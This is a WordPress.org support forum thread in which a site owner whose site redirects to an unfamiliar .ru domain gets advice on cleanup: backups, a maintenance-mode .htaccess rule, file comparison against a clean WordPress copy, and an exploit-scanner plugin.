WordPress.org

Support

Site hacked

  • Hi,

    My site has been hacked and i’m wondering the best place to start fixing it.

    It keeps redirecting to inoa-seishell.ru

    It’s intermittent (like every 3 or 4 refreshes) and usually occurs within the wp-admin section

    I’ve upgraded to the latest wordpress, and tried to update most of my plug-ins but the inoa-seishell.ru url keeps stopping me

    Any help appreciated

Viewing 15 replies - 1 through 15 (of 31 total)
  • Do you have a recent backup ?

    I would also search through all your files and the database for ‘inoa-seishell.ru’ string, to see how they did it.

    Then backup the site into a seperate file for later examination, and restore back to the last ‘good’ backup.

    Of the SQL database? yes

    tigtog

    @tigtoggmailcom

    This sounds like something you’re going to need to address via FTP and maybe php-MyAdmin rather than through the WordPress admin interface.

    In particular, I’d take a look at the .htaccess files in your root and if there are any in your subfolders, and check whether there are suspicious strings in there.

    Good that you have the database backed up.

    I think from other posters here, the recommendation for doing a site restore is to disable plugins. Anyway, here is a suggested ‘path’ to take

    1. Stop people from using your site whilst you do the restore and maintenance. I do this with modifying .htaccess as follows (e.g. if your IP address is 72.233.56.139 for example)

    At the top of your .htaccess file, add these lines

    Options +FollowSymLinks
    RewriteEngine on
    #
    RewriteCond %{REMOTE_ADDR} !^72\.233\.56\.139$
    RewriteCond %{REQUEST_URI} !/maintenance_page\.html$
    RewriteRule ^([^/]*/)*(([^.]+\.)+(php|s?html?))?$ http://www.example.com/maintenance_page.html [R=302,L]

    This assumes you have a file called maintenance_page.html in the public path of your site, with a message like “Sorry, we are closed for maintenance at present”.

    2. Do a full backup of the database and every file.

    3. Search through the database backup from step 2 for that inoa-seishell.ru’ string (without single quotes of course). There doesn’t seem to be an IP associated with that domain. Record anything you find, etc.

    4. Copy all of WP 3.1.3 to your local machine. Copy all of the plugins, etc also, to your local machine. Use a tool like beyond compare to then compare what was on your website, to what is on your local machine. They may have been able to modify some of the files, so this step ‘should’ show up, if there are any modified files.

    By the sounds of what is happening, they have added a ‘redirect’ somehow. Hopefully that is all.

    5. Let us know if you find anything.

    Pete

    That’s great Pete, thanks I’ll try that

    They have also hacked another wordpress site on the same server, so it could be a case that they have access to the root directory of my server

    I’ve changed the ftp username & password (same for all my sites) so hopefully that should stop them for now

    Hmm, if they have hacked into another site on the same server, then server security may not be as tight as it should be, or they have found a back door from one site on the server, ‘into’ another site on the same sever.

    For example, I have SSH/shell access to the server I use, but server security stops any attempt to ‘get’ to another site on the same server.

    That said, they simply may have used the same ‘dirty tricks” on 2 sites on the same server.

    Step 2 in my instructions should have been step 1 , otherwise .htaccess is not backed up, if you do modify that.

    The basis of your investigation is “what have they changed” ? So, runing a good file comparison tool like beyond compare will show up any changes, as long as you download WP 3.1.3 again, and use that as a basis for your compare.

    Some of the plugins may have ‘holes’ in them, but if they are popular and lots of downloads, then there would hopefully be less chance of an open door there. Do the compare bit by bit. Beyond compare can even do compares from local to remote (no, I don’t get a commission, lol).

    You can also compare your ‘last good db backup’ with the db backup ‘now’, and pickup anything there that sticks out.

    pete

    tigtog

    @tigtoggmailcom

    You might find the Exploit Scanner plugin useful – that’s what helped me find the culprit files the last time a site got hacked:

    http://wordpress.org/extend/plugins/exploit-scanner/

    I have downloaded the database and search through it for the inoa-seishell.ru domain and it is not there. I did an online search with phpmyadmin also.

    The exploit plug in looks really promising, although when I run it it comes up with: ‘An error occurred. Please try again later.’

    The only thing left for me to try to do is download and compare the current site as Pete suggests – would I compare that with a fresh version? They don’t have beyond compare for mac but will try to find an

    I have also used the ‘Inactive users deleter’ plug in to delete hundreds of fake registrations

    tigtog

    @tigtoggmailcom

    I hope you’ve turned registrations off until you get this sorted.

    I have now

    tigtog

    @tigtoggmailcom

    🙂

    have downloaded the database and search through it for the inoa-seishell.ru domain and it is not there. I did an online search with phpmyadmin also.

    The domain name exists, but has no IP, so I’m wondering how the redirect worked ? Did it actually go to that site ? You can force a browser to go to another site, but the user ‘sees’ something else in the url address bar in the browser. Possibly don’t discount some garbage in your database, just yet.

    In regards to turning off registrations. Good idea, but people can still access your site, hence the suggestion to mod .htacees to only allow you to access the site, everyone else will get redirected to the maint. page.

    The exploit plug in looks really promising, although when I run it it comes up with: ‘An error occurred. Please try again later.’

    If you look at the bottom right hand corner of this page , you may find some answers to that.

    The only thing left for me to try to do is download and compare the current site as Pete suggests – would I compare that with a fresh version? They don’t have beyond compare for mac but will try to find an

    There is a note about Mac’s here

    Yes, I would compare with a fresh version, and then compare the fresh version to your (previous) local version of WP. You may see something there, maybe.

    pete

    Thanks I had a look through those

    I have replaced the .htaccess file with your suggested code, the site is still redirecting, so I assume it is not the htaccess file?

    i will try beyond compare tonight

Viewing 15 replies - 1 through 15 (of 31 total)
  • The topic ‘Site hacked’ is closed to new replies.